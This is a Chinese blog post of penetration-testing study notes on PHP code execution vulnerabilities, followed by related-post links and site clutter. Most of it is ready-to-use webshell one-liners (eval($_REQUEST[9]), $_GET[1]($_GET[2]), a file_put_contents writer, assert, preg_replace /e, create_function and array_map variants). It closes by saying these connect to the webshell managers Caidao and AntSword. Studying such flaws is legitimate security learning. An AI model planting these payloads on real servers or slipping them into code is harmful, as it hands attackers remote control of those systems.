学习:渗透之代码执行漏洞

已于 2024-02-01 18:41:14 修改
阅读量379 收藏 8
点赞数 9
文章标签: 学习 网络 安全
于 2024-02-01 11:01:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zumaxyl/article/details/135968318
版权
本文详细解释了代码执行漏洞,涉及如何通过用户输入将数据作为后端代码执行,如eval、assert、file_put_contents等函数的利用,以及PHP中双引号二次解析的新威胁。讨论了这些漏洞如何与攻击工具如菜刀、蚁剑结合,警示安全风险。
摘要由CSDN通过智能技术生成

代码执行漏洞是什么:

  • 用户输入的数据被当作后端代码进行执行

典型的语句

  • <?php eval($_REQUEST[9])?>
  • <?php $_GET[1]($_GET[2])?>
  • <?=eval($_REQUEST[9])?>
  • <?php ${file_put_contents($_GET[1],$_GET[2])}?>

会造成代码执行的函数:

  • eval($a)
eval($_REQUEST[9]);

在这里插入图片描述

  • assert($a)
assert($_REQUEST[9]);
assert("eval('$_REQUEST[9]')")
file_put_contents('1.php','<?php echo 1;echo 2;?>')

在这里插入图片描述
在这里插入图片描述

  • preg_replace()
<?php
echo preg_replace('/a/e',$_GET[9],'ac');
?>

在这里插入图片描述

  • create_function()
$a=create_function('',$_REQUEST[9]);

在这里插入图片描述

  • array_map()
array_map('assert',$_GET);

在这里插入图片描述

在这里插入图片描述

  • call_user_func()
  • 双引号二次解析(php5.5.38及以上版本)
"${phpinfo()}";

在这里插入图片描述
双引号二次解析需配合文件写入使用

总结:

以上即可连接菜刀、蚁剑使用

白帽游皮
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
hack_the_box:渗透测试学习之路
03-12
【标题】"hack_the_box:渗透测试学习之路"揭示了一个以黑客挑战平台"Hack The Box"为主题的深入学习之旅。这个平台让网络安全爱好者和专业人士通过模拟真实世界的渗透测试场景来提升自己的技能。渗透测试,又称白帽...
WEB渗透学习-upload-labs靶场
04-20
通过解决每个关卡,学习者将熟悉以下常见漏洞: 1. **基础验证**:初步理解上传限制,如文件类型检查。 2. **绕过MIME类型检查**:学习如何通过修改MIME类型绕过服务器的验证。 3. **绕过文件扩展名检查**:了解...
WEB安全基础 - - -命令执行漏洞
weixin_67503304的博客
07-28 1494
简要介绍命令执行漏洞的原理,总结了常用的PHP代码执行函数。
命令执行代码执行漏洞原理
Spontaneous_0的博客
03-16 412
命令执行代码执行漏洞原理
Java代码漏洞检测-常见漏洞与修复建议
最新发布
dzqxwzoe的博客
05-29 1365
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
代码执行漏洞
qq_58000413的博客
07-25 272
echopreg_replace('/a/e',$_REQUEST[8],'abc');assert单行执行,可以扩展到多行执行assert(eval())assert(file_put_content())5.array_map('要调用的函数','要传入的值')//回调函数,调用某个函数,把数组塞到函数依次执行。echo'$b'?一句话木马array_map('assert',array($_REQUEST[8]));...
RCE漏洞总结及绕过---代码执行
qq_46603839的博客
04-30 876
eval():该函数把字符串当做php代码来计算,并且字符串必须是合法的php代码,要以分号结尾;assert():该函数会检查一个指定断言。断言是一个逻辑学词汇,主要用于程序员来进行假设判断。断言只有两种类型,字符串型或者布尔型,当断言为flse时返回字符串表达式。如果断言是字符串那么会当做php代码执行;preg_replace():/e模式 正则匹配替换字符串,7.0版本后/e已经移除了;
代码执行详解
Y22Lee的博客
04-28 572
(2)使用file-put-contents(),类似上面的方法,在传参时输入A=file-put-contents(‘1.php’,‘
Web渗透测试-常见漏洞解析课件
03-23
4. 文件包含漏洞:当应用程序允许用户指定动态加载的文件路径时,攻击者可能利用此漏洞执行任意代码。避免这种风险的方法是限制文件类型和来源,使用白名单策略。 5. 不安全的直接对象引用(IDOR):当应用程序直接...
WEB代码审计和渗透测试讲义.ppt
12-18
* 代码执行执行任意代码漏洞 * 命令执行执行任意命令漏洞 * 文件系统操作:文件(目录)读写等漏洞 * 数据库操作:SQL注射漏洞 * 数据显示:XSS等客户端漏洞 四、变量跟踪和漏洞利用 * 通过变量找函数:正向...
渗透测试,文件上传漏洞笔记知识梳理图,适用于学习渗透测试初学者学习,仅供参考学习
06-02
文件上传漏洞允许攻击者将恶意代码以文件的形式上传到目标服务器,从而可能控制服务器、执行任意代码或者利用其他系统漏洞进行进一步攻击。 在Java、PHP、JSP、JXSP等语言环境中,文件上传漏洞往往源于后端验证不足...
渗透性:渗透资料
02-23
渗透测试,或者称为“渗透性测试”,是一种网络安全评估方法,旨在发现并修复系统中的漏洞,以防止未经授权的访问、攻击或数据泄露。在IT行业中,尤其是对于PHP开发的Web应用程序,进行渗透测试至关重要,因为PHP是...
pentest:渗透测试知识库
03-30
渗透测试过程中,我们通常会使用各种shell命令来探测、扫描和利用目标系统的漏洞。shell是操作系统的一个界面,允许用户通过命令行交互执行任务。在Linux或Unix系统中,bash shell是最常用的,而在Windows系统中,...
WEB代码审计与渗透测试.rar_web审计_代码审计_渗透
09-23
WEB代码审计是对Web应用程序源代码或可执行代码进行深度检查的过程,旨在识别潜在的安全漏洞和不良编程习惯。这个过程包括以下几个关键步骤: - **静态分析**:不运行代码,通过解析代码结构来查找可能的问题。 - *...
任意代码执行漏洞
LJH1999ZN的博客
02-23 3100
一、什么是任意代码执行漏洞 web应用程序是指程序员在代码中使用了一些执行函数例如eval,assert等函数,用户可以控制这个字符串去这些函数中执行,从而造成安全漏洞 二、漏洞的危害 执行任意的代码,例如协议脚本文件 向网站写入webshell 控制整个网站或者服务器 三、任意代码执行漏洞 1.eval()函数 ...
10.26_eval函数引起的命令执行漏洞
weixin_43460822的博客
10-26 3176
“百度杯”CTF比赛 2017 二月场 题目: <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); 这道题跟上道题有点类似,可以用上道题的方法试试,不行再换,不过题目给出的提示说flag不在变量中,所以很可能不行,但还是要试试. 构建paylo...
缓冲区溢出指南 1.pdf
10-06
网络安全渗透测试中,缓冲区溢出漏洞是一种常见的攻击手段,它涉及到编程中的内存管理错误。本文档《BufferOverflowGuide1》由Joas Antonio撰写,他是一位经验丰富的安全专家,主要分享了关于exploit(利用程序)...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值